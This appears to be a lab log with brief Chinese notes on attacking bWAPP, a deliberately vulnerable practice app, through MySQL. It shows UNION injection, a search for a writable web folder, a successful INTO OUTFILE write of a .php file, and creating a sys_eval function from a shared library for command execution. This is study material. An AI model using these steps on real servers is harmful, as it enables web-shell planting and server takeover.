mysql> select * from heroes where id = 7;
Empty set (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,4;
+----+-------+----------+--------+
| id | login | password | secret |
+----+-------+----------+--------+
| 1 | 2 | 3 | 4 |
+----+-------+----------+--------+
1 row in set (0.00 sec)
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/';
ERROR 1086 (HY000): File '/var/www/html/' already exists
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/abc.txt';
ERROR 1 (HY000): Can't create/write to file '/var/www/html/abc.txt' (Errcode: 13)
mysql>
找到有写权限的文件夹。
mysql> use bWAPP;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from heroes where id = 7 union select 1,2,3,'hello' into outfile '/var/www/html/images/abc.php';
Query OK, 1 row affected (0.00 sec)
mysql>
剔除回车
tr -d ‘\n’ < input.txt > output.txt
成功写入。
创建自定义函数。
create function sys_eval returns string soname "lib_linux1.so";
